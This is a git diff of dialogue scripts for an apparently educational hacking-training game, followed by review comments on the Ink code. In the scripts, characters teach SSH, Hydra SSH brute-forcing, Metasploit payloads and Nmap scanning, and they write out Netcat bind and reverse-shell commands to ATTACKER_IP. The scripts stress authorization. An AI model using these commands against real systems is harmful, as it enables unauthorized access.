/usr/share/wordlists/ -Tech Instructor: **Phase 1 - Information Gathering:** Passive and active reconnaissance. Learning about your target. + Haxolottle: rockyou.txt is popular - 14 million passwords from breaches -Tech Instructor: **Phase 2 - Vulnerability Analysis:** Identifying weaknesses in systems and applications. + Haxolottle: It's gzipped, unzip with: gunzip /usr/share/wordlists/rockyou.txt.gz -Tech Instructor: **Phase 3 - Exploitation:** Actually compromising systems using identified vulnerabilities. ++ [How fast is it?] + Haxolottle: Depends on the service and your connection. -Tech Instructor: **Phase 4 - Post-Exploitation:** What you do after gaining access. 
Maintaining access, pivoting, data exfiltration. + Haxolottle: Local services: thousands of attempts per second -Tech Instructor: The Applications menu mirrors this structure. When you need a tool, think about which phase you're in, and browse that category. + Haxolottle: Remote SSH: dozens per second (network latency) -Tech Instructor: You'll also quickly learn the handful of tools you use constantly. Nmap, Metasploit, Burp Suite, Wireshark—these become second nature. + Haxolottle: Use -t flag to increase parallel tasks: hydra -t 4 ... -~ instructor_rapport += 5 --> linux_training_hub ++ [Isn't this illegal?] + Haxolottle: Only against systems you don't have permission to test! -// =========================================== -// SSH - SECURE SHELL -// =========================================== + Haxolottle: On your own systems or with written authorization, it's legal security testing. -=== ssh_intro === -~ ssh_discussed = true -~ instructor_rapport += 5 + Haxolottle: Without permission, it's unauthorized access - very illegal. -Tech Instructor: SSH - Secure Shell. Encrypted remote access to systems. One of your most critical tools. ++ [I understand] + -> linux_hub -Tech Instructor: SSH lets you securely connect to remote Linux systems and execute commands as if you were sitting at that machine. All traffic is encrypted, protecting against eavesdropping. +- -> linux_hub -Tech Instructor: Basic usage: "ssh username@ip_address" +=== kali_linux === +Haxolottle: Kali Linux - the security professional's distro. -Tech Instructor: The server typically listens on port 22. When you connect, you authenticate (usually with password or key), and then you have a remote shell. +~ haxolottle_rapport += 5 -Tech Instructor: SSH replaced older, insecure protocols like Telnet and rlogin, which transmitted passwords in cleartext. Never use those—always use SSH. +Haxolottle: It's Debian-based but comes pre-loaded with hundreds of security tools. 
-* [Tell me about SSH keys] - You: What about SSH key authentication? - -> ssh_keys -* [What's X11 forwarding?] - ~ ssh_x_forwarding_discussed = true - You: I saw something about -X flag for forwarding? - -> ssh_x_forwarding -* [How do I verify I'm connecting to the right server?] - You: How do I know I'm not being man-in-the-middled? - -> ssh_fingerprints -* [Let's talk about attacking SSH] - You: How do we test SSH security? - -> ssh_to_hydra_transition -* [Got the basics] - ~ completed_ssh_challenge = true - -> linux_training_hub ++ [What makes Kali special?] + Haxolottle: All the tools you need, already installed and configured: -=== ssh_keys === -~ instructor_rapport += 10 + Haxolottle: Network scanners (Nmap), exploitation frameworks (Metasploit), password crackers (John, Hashcat, Hydra) -Tech Instructor: SSH keys are asymmetric cryptography for authentication. Much more secure than passwords. + Haxolottle: Web testing tools (Burp Suite, OWASP ZAP, Nikto), wireless tools (Aircrack-ng) -Tech Instructor: You generate a key pair: a private key (keep secret) and public key (share freely). + Haxolottle: Forensics tools, reverse engineering tools, you name it. -Tech Instructor: Generate keys: "ssh-keygen -t rsa -b 4096" + Haxolottle: Saves you hours of setup time. -Tech Instructor: Copy public key to server: "ssh-copy-id user@server" ++ [Should I use Kali as my main OS?] + Haxolottle: Nah, don't do that. -Tech Instructor: Now you can SSH without typing passwords. The private key proves your identity. + Haxolottle: Kali is meant for security work, not daily use. -Tech Instructor: Benefits: stronger than passwords, can't be bruteforced, can be passphrase-protected, can be revoked per-server. + Haxolottle: Run it in a VM, or dual-boot, or use a live USB. -Tech Instructor: Many organizations require key-based auth and disable password authentication entirely. Learn this workflow. 
+ Haxolottle: You don't want to browse the web and check email as root with all these attack tools. -~ instructor_rapport += 10 --> ssh_intro ++ [What's the default password?] + Haxolottle: Newer Kali: username "kali", password "kali" -=== ssh_x_forwarding === -~ instructor_rapport += 8 + Haxolottle: Older versions: username "root", password "toor" -Tech Instructor: X11 forwarding is clever. Linux graphical applications use the X Window System. SSH can tunnel X11 traffic. + Haxolottle: Change these immediately if you're using Kali seriously! -Tech Instructor: Connect with: "ssh -X user@server" ++ [Tell me about some specific tools] + Haxolottle: We've got separate discussions for the big ones. -Tech Instructor: Now you can run graphical programs on the remote server, but see them on your local screen. The program runs remotely, but displays locally. + Haxolottle: Ask me about Nmap for scanning, Metasploit for exploitation, or specific tools you're curious about. -Tech Instructor: Example: "kate" opens the text editor, running on the remote system but displaying on yours. Useful for accessing GUI tools remotely. ++ [Got it] + -> linux_hub -Tech Instructor: Warning: some latency over networks. And it does expose some security risks—only use on trusted connections. - -~ instructor_rapport += 5 --> ssh_intro - -=== ssh_fingerprints === -~ instructor_rapport += 10 - -Tech Instructor: Excellent security awareness. SSH uses host key fingerprints to prevent man-in-the-middle attacks. - -Tech Instructor: When you first connect, SSH shows the server's fingerprint. You should verify this matches the real server before accepting. - -Tech Instructor: On the server, check fingerprint: "ssh-keygen -lf /etc/ssh/ssh_host_rsa_key.pub" - -Tech Instructor: If the fingerprint matches what SSH showed you, type "yes". SSH remembers this and will warn if it changes later. - -Tech Instructor: If the fingerprint changes unexpectedly, that's a warning sign. 
Could be a man-in-the-middle attack, or could be the server was rebuilt. Investigate before proceeding. - -Tech Instructor: Most people skip this check. Don't be most people. Especially in adversarial security contexts. - -~ instructor_rapport += 10 --> ssh_intro - -=== ssh_to_hydra_transition === -Tech Instructor: Now you're thinking like a penetration tester. Let's talk about attacking SSH. --> hydra_intro - -// =========================================== -// HYDRA - SSH ATTACKS -// =========================================== - -=== hydra_intro === -~ hydra_discussed = true -~ instructor_rapport += 5 - -Tech Instructor: Hydra. THC-Hydra, to be specific. A parallelized login cracker supporting numerous protocols. - -Tech Instructor: Hydra performs **online bruteforce attacks**—it actually tries to log in with username/password combinations. Different from offline attacks where you crack hashed passwords. - -Tech Instructor: Basic usage: "hydra -l username -p password target ssh" - -Tech Instructor: Tests a single username/password combo. But Hydra's power is testing many combinations from wordlists. - -Tech Instructor: Supports dozens of protocols: SSH, FTP, HTTP, RDP, SMB, databases, and more. If it accepts login credentials, Hydra can probably attack it. - -* [How do I use wordlists?] - ~ bruteforce_basics_discussed = true - You: How do I test multiple passwords? - -> hydra_wordlists -* [How fast is Hydra?] - You: How quickly can it crack passwords? - -> hydra_speed -* [What are the legal/ethical considerations?] - You: Is this legal to use? - -> hydra_ethics -* [I'm ready to try it] - ~ completed_hydra_challenge = true - -> linux_training_hub - -=== hydra_wordlists === -~ instructor_rapport += 10 - -Tech Instructor: Wordlists are the fuel for Hydra. Collections of common passwords to test. - -Tech Instructor: Usage: "hydra -l username -P /path/to/wordlist.txt target ssh" - -Tech Instructor: Capital -P for password list, lowercase -l for single username. 
Or use -L for username list too. - -Tech Instructor: Kali includes wordlists: "ls /usr/share/wordlists/seclists/Passwords/" - -Tech Instructor: **Choosing the right wordlist is critical.** A wordlist with 10 million passwords might take days for online attacks. Start with smaller, curated lists of common passwords. - -Tech Instructor: For SSH specifically, "Common-Credentials" lists work well. They contain default passwords and common weak passwords. - -Tech Instructor: Real-world advice: online attacks are slow and noisy. They generate logs. They trigger intrusion detection. Use them strategically, not as your first approach. - -~ completed_hydra_challenge = true -~ instructor_rapport += 10 --> linux_training_hub - -=== hydra_speed === -~ instructor_rapport += 8 - -Tech Instructor: Speed depends on many factors: network latency, server response time, number of parallel connections. - -Tech Instructor: Hydra's "-t" flag controls parallel tasks. "hydra -t 4" uses 4 parallel connections. - -Tech Instructor: More isn't always better. Too many parallel connections can crash services or trigger rate limiting. For SSH, 4-16 threads is usually reasonable. - -Tech Instructor: Realistic expectations: online SSH bruteforce might test 10-50 passwords per second. Against a wordlist with 10,000 passwords, that's several minutes at best. - -Tech Instructor: Compare to offline cracking (like hashcat on GPUs), which can test billions of passwords per second. Online attacks are fundamentally slower. - -Tech Instructor: Strategic implication: online attacks work best when you have good intelligence. If you know username is "admin" and password is probably from a short list of defaults, Hydra excels. Blind bruteforce against random accounts? Impractical. - -~ instructor_rapport += 8 --> linux_training_hub - -=== hydra_ethics === -~ instructor_rapport += 10 - -Tech Instructor: Critical question. Shows good judgment. 
- -Tech Instructor: **Legal status:** Hydra itself is legal to possess and use in authorized security testing. Unauthorized use against systems you don't own or have explicit permission to test? That's computer fraud. Felony-level crime in most jurisdictions. - -Tech Instructor: **In this training:** You're attacking lab systems we control, with explicit permission. This is legal and ethical training. - -Tech Instructor: **In SAFETYNET operations:** You'll have authorization for your targets. Still legally gray area, but covered by classified operational authorities. - -Tech Instructor: **In the real world:** Never, ever use these tools against systems without written authorization. Penetration testers get contracts. Bug bounty hunters follow program rules. Hobbyists practice in their own isolated labs. - -Tech Instructor: The skills you're learning are powerful. Use them responsibly. With authorization. Within the law. That's not optional—it's core to professional security work. - -~ instructor_rapport += 15 --> linux_training_hub - -// =========================================== -// COMMANDS REFERENCE -// =========================================== +- -> linux_hub === commands_reference === -~ instructor_rapport += 5 +Haxolottle: Here's a quick reference of essential Linux commands. -Tech Instructor: Here's your essential commands quick reference: +~ haxolottle_rapport += 3 -Tech Instructor: **Navigation:** -- pwd (print working directory) -- ls, ls -la (list files, detailed) -- cd directory (change directory) -- cd .. 
(up one level), cd (home) +Haxolottle: **Navigation & Files:** -Tech Instructor: **File Operations:** -- mkdir (make directory) -- cp source dest (copy), cp -r (recursive) -- mv old new (move/rename) -- cat filename (display file) -- less filename (scrollable view) -- echo "text" (print text) +Haxolottle: pwd (where am I), ls (list files), cd (change directory) -Tech Instructor: **Getting Help:** -- man command (manual page) -- info command (info page) -- command --help (quick help) +Haxolottle: cat (show file), less (page through file), head/tail (first/last lines) -Tech Instructor: **Text Processing:** -- grep pattern (filter lines) -- sort (sort lines) -- uniq (remove duplicates) -- head, tail (first/last lines) -- wc -l (count lines) +Haxolottle: cp (copy), mv (move/rename), rm (delete), mkdir (make directory) -Tech Instructor: **Networking:** -- ifconfig, ip a s (show interfaces) -- hostname -I (show IP) -- ssh user@host (remote shell) -- ssh -X user@host (X11 forwarding) +Haxolottle: **Text Processing:** -Tech Instructor: **Security Tools:** -- hydra -l user -p pass target ssh (test SSH login) -- hydra -l user -P wordlist target ssh (bruteforce SSH) +Haxolottle: grep (search), sort (sort lines), uniq (remove duplicates) -+ [Back to main menu] - -> linux_training_hub +Haxolottle: wc -l (count lines), cut (extract columns), sed (stream editor) -// =========================================== -// CHALLENGE TIPS -// =========================================== +Haxolottle: **System Info:** -=== challenge_tips === -~ instructor_rapport += 5 +Haxolottle: whoami (current user), id (user details), uname -a (system info) -Tech Instructor: Practical tips for the hands-on challenges: +Haxolottle: ps aux (all processes), top (live process monitor), df -h (disk space) -Tech Instructor: **For SSH practice:** -- Verify fingerprints before accepting -- Try both regular SSH and -X flag for X forwarding -- Use "exit" or Ctrl-D to disconnect -- Check "who" command to see who else 
is connected +Haxolottle: **Networking:** -Tech Instructor: **For Hydra attacks:** -- Start with small, targeted wordlists from /usr/share/wordlists/seclists/Passwords/Common-Credentials/ -- Use -t 4 for reasonable parallel connections -- Be patient—online attacks are slow -- Watch for successful login messages -- Remember to actually SSH in once you crack credentials +Haxolottle: ip a or ifconfig (IP address), netstat/ss (connections), ping (connectivity test) -Tech Instructor: **For finding flags:** -- Navigate to user home directories -- Use "cat" to read files -- Remember "sudo" lets you act as root (if you have permission) -- Check file permissions with "ls -la" +Haxolottle: **Remote Access:** -Tech Instructor: **General advice:** -- Use Tab completion to save typing -- Use up arrow to recall previous commands -- If stuck, check man pages -- Take notes on what works +Haxolottle: ssh user@host (connect to remote system), scp (secure copy over SSH) -+ [Back to main menu] - -> linux_training_hub +Haxolottle: **Security Tools:** -// =========================================== -// READY FOR PRACTICE -// =========================================== +Haxolottle: hydra (password attacks), nmap (network scanning - ask me about this!) -=== ready_for_practice === -~ instructor_rapport += 5 +Haxolottle: **Piping & Redirection:** -Tech Instructor: Excellent. You've covered the fundamentals. +Haxolottle: command | command (pipe output to another command) -{command_line_skills_discussed and piping_discussed and redirection_discussed and ssh_discussed and hydra_discussed: - Tech Instructor: You've reviewed all the core material. You should be well-prepared for the practical exercises. -- else: - Tech Instructor: You might want to review the topics you haven't covered yet, but you've got enough to start. -} +Haxolottle: command > file (save output to file), command >> file (append to file) -Tech Instructor: Remember: the best way to learn Linux is by doing. 
Read the challenges, try commands, make mistakes, figure out fixes. That's how you build real competence. ++ [Tell me about Nmap] + INCLUDE tools/nmap_basics.ink -> nmap_what_is_it -Tech Instructor: Practical objectives: -1. Practice basic command-line navigation and file manipulation -2. Edit files with vi -3. Use piping and redirection -4. SSH between systems -5. Use Hydra to crack weak SSH credentials -6. Capture flags from compromised accounts ++ [Tell me about Metasploit] + INCLUDE tools/metasploit_basics.ink -> metasploit_what_is_it -Tech Instructor: The lab environment is yours to experiment in. Break things. It's a safe space for learning. ++ [Tell me about Netcat] + INCLUDE tools/netcat_basics.ink -> netcat_what_is_it -{instructor_rapport >= 50: - Tech Instructor: You've asked great questions and engaged deeply with the material. That's exactly the right approach. You're going to do well. -} ++ [Back to main topics] + -> linux_hub -Tech Instructor: Good luck, Agent {player_name}. You've got this. +- -> linux_hub --> end_session - -// =========================================== -// END SESSION -// =========================================== - -=== end_session === - -Tech Instructor: Whenever you need a refresher on Linux fundamentals, I'm here. - -{instructor_rapport >= 40: - Tech Instructor: You've demonstrated solid understanding and good security awareness. Keep that mindset. -} - -Tech Instructor: Now get to that terminal and start practicing. Theory is useful, but hands-on experience is how you actually learn. - -Tech Instructor: See you in the field, Agent. - -#exit_conversation -> END diff --git a/story_design/ink/game_scenarios/tools/metasploit_basics.ink b/story_design/ink/game_scenarios/tools/metasploit_basics.ink new file mode 100644 index 0000000..65950eb --- /dev/null +++ b/story_design/ink/game_scenarios/tools/metasploit_basics.ink 
@@ -0,0 +1,148 @@ +// Metasploit Framework - Reusable Explanations +// Used across multiple scenarios + +=== metasploit_what_is_it === +Haxolottle: Metasploit is your exploitation toolkit, little axolotl. + +Haxolottle: It's a framework with thousands of exploits, payloads, and post-exploitation tools all in one place. + +Haxolottle: Think of it as a Swiss Army knife for hacking. + ++ [How do I start using it?] + -> metasploit_getting_started + ++ [What can it do?] + -> metasploit_capabilities + ++ [Got it] + -> DONE + +=== metasploit_getting_started === +Haxolottle: Start the console: msfconsole + +Haxolottle: It takes a moment to load - over 2000 exploits to initialize. + +Haxolottle: Once you're in, you'll see the msf > prompt. That's your command center. + ++ [How do I find exploits?] + Haxolottle: Use search: search apache or search platform:windows + + Haxolottle: You can search by name, platform, CVE number, whatever you know about the target. + + Haxolottle: Try: search cve:2021-3156 to find a specific vulnerability. + ++ [How do I use an exploit?] + -> metasploit_exploitation_workflow + ++ [Show me the basic workflow] + -> metasploit_exploitation_workflow + ++ [That's enough for now] + -> DONE + +=== metasploit_capabilities === +Haxolottle: Metasploit does it all, really. + +Haxolottle: Exploitation: Thousands of exploits for every platform - Windows, Linux, web apps, you name it. + +Haxolottle: Payloads: After exploitation, what do you want? A shell? Meterpreter? Execute a command? + +Haxolottle: Post-exploitation: Once you're in, gather info, escalate privileges, pivot to other systems. + +Haxolottle: It even has auxiliary modules for scanning, fuzzing, and denial of service. + ++ [Tell me about the workflow] + -> metasploit_exploitation_workflow + ++ [What's Meterpreter?] + -> meterpreter_intro + ++ [I get the idea] + -> DONE + +=== metasploit_exploitation_workflow === +Haxolottle: Here's the standard workflow: + +Haxolottle: 1. 
Search for an exploit: search distcc + +Haxolottle: 2. Select it: use exploit/unix/misc/distcc_exec + +Haxolottle: 3. Check options: show options + +Haxolottle: 4. Set required options: set RHOST 10.0.0.5 and set LHOST YOUR_IP + +Haxolottle: 5. Choose a payload: show payloads, then set PAYLOAD cmd/unix/reverse + +Haxolottle: 6. Launch: exploit or run + ++ [What's RHOST and LHOST?] + Haxolottle: RHOST is the remote host - your target's IP address. + + Haxolottle: LHOST is your local host - your Kali machine's IP, where shells connect back to. + + Haxolottle: Always double-check these before running an exploit! + ++ [What if the exploit doesn't work?] + Haxolottle: First, run show options again and verify everything is set correctly. + + Haxolottle: Check that the target is actually running the vulnerable service. + + Haxolottle: Some exploits are unreliable or version-specific. Try a different one. + ++ [Tell me about payloads] + -> metasploit_payloads + ++ [Clear enough] + -> DONE + +=== metasploit_payloads === +Haxolottle: Payloads are what happens after exploitation succeeds. + +Haxolottle: Simple shells: windows/shell/reverse_tcp or cmd/unix/reverse + +Haxolottle: These give you a basic command prompt on the target. + +Haxolottle: Meterpreter: windows/meterpreter/reverse_tcp or linux/x86/meterpreter/reverse_tcp + +Haxolottle: Meterpreter is way more powerful - file upload/download, keylogging, process migration, you name it. + ++ [When should I use which payload?] + Haxolottle: For quick access and simple commands, use regular shells. + + Haxolottle: For post-exploitation work - gathering intel, escalating privileges, pivoting - use Meterpreter. + + Haxolottle: Meterpreter is also more stable and has better error handling. + ++ [Tell me more about Meterpreter] + -> meterpreter_intro + ++ [Got it] + -> DONE + +=== meterpreter_intro === +Haxolottle: Meterpreter is Metasploit's advanced payload. 
+ +Haxolottle: It runs entirely in memory - no files written to disk, harder to detect. + +Haxolottle: It's dynamically extensible - load features as you need them. + +Haxolottle: And it has tons of built-in commands for everything you'd want to do post-exploitation. + ++ [What commands does Meterpreter have?] + Haxolottle: Type help after getting a Meterpreter shell to see them all. + + Haxolottle: Key ones: getuid (current user), ps (processes), migrate (switch processes) + + Haxolottle: File operations: ls, cd, download, upload, cat + + Haxolottle: System: sysinfo, getprivs, shell (drop to OS shell) + ++ [How do I get a Meterpreter shell?] + Haxolottle: Just use a Meterpreter payload when exploiting. + + Haxolottle: Like: set PAYLOAD windows/meterpreter/reverse_tcp + + Haxolottle: Then exploit normally. You'll get a meterpreter > prompt instead of a system shell. + ++ [I understand] + -> DONE diff --git a/story_design/ink/game_scenarios/tools/netcat_basics.ink b/story_design/ink/game_scenarios/tools/netcat_basics.ink new file mode 100644 index 0000000..54476f3 --- /dev/null +++ b/story_design/ink/game_scenarios/tools/netcat_basics.ink 
@@ -0,0 +1,98 @@ +// Netcat Tool - Reusable Explanations +// Used in intro_linux and vulnerabilities scenarios + +=== netcat_what_is_it === +Haxolottle: Netcat is the Swiss Army knife of networking, little axolotl. + +Haxolottle: It can read and write data across network connections - TCP or UDP. + +Haxolottle: People call it "nc" for short, and it's on basically every Linux system. + ++ [What can I use it for?] + -> netcat_uses + ++ [How do I use it?] + -> netcat_basic_usage + ++ [Got it] + -> DONE + +=== netcat_uses === +Haxolottle: Netcat does a ton of things: + +Haxolottle: Port scanning: Check if a port is open + +Haxolottle: File transfer: Send files between systems + +Haxolottle: Banner grabbing: Connect to services and see what they say + +Haxolottle: Bind shells: Listen for connections and serve up a shell + +Haxolottle: Reverse shells: Connect back to an attacker and give them a shell + ++ [Tell me about shells] + -> netcat_shells + ++ [How do I use these features?] + -> netcat_basic_usage + ++ [I understand] + -> DONE + +=== netcat_basic_usage === +Haxolottle: Basic netcat commands: + +Haxolottle: Connect to a port: nc TARGET_IP PORT + +Haxolottle: Listen on a port: nc -l -p PORT or nc -lvp PORT + +Haxolottle: Send a file: nc -w 1 TARGET_IP PORT < file.txt + +Haxolottle: Receive a file: nc -l -p PORT > file.txt + ++ [What's the -l flag?] + Haxolottle: The -l flag means "listen" - act as a server instead of a client. + + Haxolottle: Without -l, netcat connects TO something. + + Haxolottle: With -l, netcat waits FOR something to connect. + ++ [Tell me about shells] + -> netcat_shells + ++ [That's clear] + -> DONE + +=== netcat_shells === +Haxolottle: Netcat can create shells - command line access to remote systems. + +Haxolottle: **Bind shell**: Target listens, you connect. 
+ +Haxolottle: On target: nc -l -p 4444 -e /bin/bash (Linux) or nc.exe -l -p 4444 -e cmd.exe (Windows) + +Haxolottle: On attacker: nc TARGET_IP 4444 + +Haxolottle: **Reverse shell**: You listen, target connects to you. + +Haxolottle: On attacker: nc -l -p 4444 + +Haxolottle: On target: nc ATTACKER_IP 4444 -e /bin/bash (Linux) or nc.exe ATTACKER_IP 4444 -e cmd.exe (Windows) + ++ [Why would I use one over the other?] + Haxolottle: Bind shells are simpler but firewalls usually block incoming connections. + + Haxolottle: Reverse shells bypass firewalls because the target initiates the connection outbound. + + Haxolottle: In real attacks, reverse shells are much more reliable. + ++ [What's the -e flag doing?] + Haxolottle: The -e flag executes a program and pipes all connection data through it. + + Haxolottle: So -e /bin/bash means "run bash and send everything through this connection." + + Haxolottle: The attacker types commands, they go through netcat to bash, output comes back. + + Haxolottle: Note: Not all netcat versions support -e for security reasons. + ++ [I get it now] + -> DONE diff --git a/story_design/ink/game_scenarios/tools/nmap_basics.ink b/story_design/ink/game_scenarios/tools/nmap_basics.ink new file mode 100644 index 0000000..768ec97 --- /dev/null +++ b/story_design/ink/game_scenarios/tools/nmap_basics.ink 
@@ -0,0 +1,85 @@ +// Nmap Tool - Reusable Explanations +// Used across multiple scenarios + +=== nmap_what_is_it === +Haxolottle: Nmap is your eyes on the network, little axolotl. + +Haxolottle: It's a network scanner that reveals what's running on remote systems - open ports, services, even operating systems. + +Haxolottle: Every hacker starts with reconnaissance, and Nmap is the reconnaissance king. + ++ [How do I use it?] + -> nmap_basic_usage + ++ [What can it tell me?] + -> nmap_capabilities + ++ [Got it, thanks] + -> DONE + +=== nmap_basic_usage === +Haxolottle: The simplest scan: nmap TARGET_IP + +Haxolottle: This checks the 1000 most common ports. Quick and dirty. + +Haxolottle: Want more detail? Add -sV for service versions: nmap -sV TARGET_IP + +Haxolottle: Need everything? Scan all ports: nmap -p- TARGET_IP + +Haxolottle: That one takes time, but you'll find every listening service. + ++ [What about stealth?] + Haxolottle: Smart question. Use SYN scans: sudo nmap -sS TARGET_IP + + Haxolottle: They're faster and slightly stealthier than full TCP connections. + + Haxolottle: Though honestly, any halfway decent IDS will still spot you. + ++ [Tell me more about what Nmap reveals] + -> nmap_capabilities + ++ [That's what I needed] + -> DONE + +=== nmap_capabilities === +Haxolottle: Nmap tells you the attack surface - everything exposed to the network. + +Haxolottle: Open ports: Is SSH running? Web server? Database? + +Haxolottle: Service versions: Not just "SSH," but "OpenSSH 7.4" - specific enough to look up vulnerabilities. + +Haxolottle: Operating system: With -O flag, Nmap can guess if it's Windows, Linux, what version. + +Haxolottle: And with NSE scripts (--script), it can even check for specific vulnerabilities. + ++ [How do I scan for vulnerabilities?] + Haxolottle: Use the vuln script category: nmap --script vuln TARGET_IP + + Haxolottle: It's not as thorough as dedicated scanners, but it catches common issues. 
+ ++ [Show me some useful command examples] + -> nmap_examples + ++ [I understand Nmap now] + -> DONE + +=== nmap_examples === +Haxolottle: Here are the commands I use most: + +Haxolottle: Full scan with versions: nmap -sV -p- TARGET_IP + +Haxolottle: Fast scan with OS detection: nmap -sS -O TARGET_IP + +Haxolottle: Vulnerability check: nmap --script vuln -sV TARGET_IP + +Haxolottle: Save results: nmap -sV -oA scan_results TARGET_IP + +Haxolottle: The -oA saves in all formats - normal, XML, and greppable. + ++ [What's the TARGET_IP placeholder?] + Haxolottle: Just replace it with the actual IP address you're scanning. + + Haxolottle: Like: nmap -sV 10.0.0.5 + ++ [Thanks, that's clear] + -> DONE
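Review bot: In intro_linux.ink, the three tool choices at the end of commands_reference put "INCLUDE tools/nmap_basics.ink" (and the Metasploit and Netcat equivalents) inside choice bodies, but ink's documentation says INCLUDE statements belong at the top of a file, not inside knots. Move the three INCLUDE lines to the top of intro_linux.ink, next to the VAR and EXTERNAL declarations, and leave only the diverts ("-> nmap_what_is_it" and so on) under the choices. Separately, in ssh_basics the line "The server checks your private key (which never leaves your machine)" contradicts itself: the server holds only the public key and verifies a signature made with the private key, so reword it along those lines. The removed ssh_fingerprints knot (verifying the host key on first connect) also has no counterpart among the new ssh_basics choices; a short choice covering it would keep that material.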
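Review bot: In metasploit_basics.ink, the choices that carry inline dialogue have no divert and no gather after them: "[How do I find exploits?]" in metasploit_getting_started, "[What's RHOST and LHOST?]" and "[What if the exploit doesn't work?]" in metasploit_exploitation_workflow, "[When should I use which payload?]" in metasploit_payloads, and the first two choices in meterpreter_intro. After the last line of each answer the flow runs out of content. intro_linux.ink closes every choice list with a gather ("- -> linux_hub"); do the equivalent here, for example a gather that diverts back to the enclosing knot. Also, "[How do I use an exploit?]" and "[Show me the basic workflow]" in metasploit_getting_started both divert to metasploit_exploitation_workflow, so one of them can go, and "over 2000 exploits" there sits oddly beside "thousands of exploits" in metasploit_what_is_it and metasploit_capabilities.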
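Review bot: In netcat_basics.ink, every exit choice ends in "-> DONE", so a scenario that enters with a plain divert (commands_reference in intro_linux.ink uses "-> netcat_what_is_it") has its flow stop inside the tool file instead of returning to linux_hub. The header says the file is used in intro_linux and vulnerabilities scenarios, so a hard-coded return target would not work either. Make the knots tunnels: end the exits with "->->" and call them as "-> netcat_what_is_it ->" followed by the caller's own hub divert. The same applies to nmap_basics.ink and metasploit_basics.ink. The choices with inline answers here ("[What's the -l flag?]", "[Why would I use one over the other?]", "[What's the -e flag doing?]") also need a divert or gather after them.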
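Review bot: In nmap_basics.ink, nmap_examples gives "nmap -sS -O TARGET_IP" without sudo, while nmap_basic_usage introduces the same scan type as "sudo nmap -sS TARGET_IP". SYN scans and OS detection both need root privileges, so the example fails for a player who copies it as an unprivileged user; prefix it with sudo, and mention the privilege requirement where nmap_capabilities introduces the -O flag. The inline-answer choices "[What about stealth?]", "[How do I scan for vulnerabilities?]" and "[What's the TARGET_IP placeholder?]" have no divert or gather after them, so each needs one to avoid running out of content.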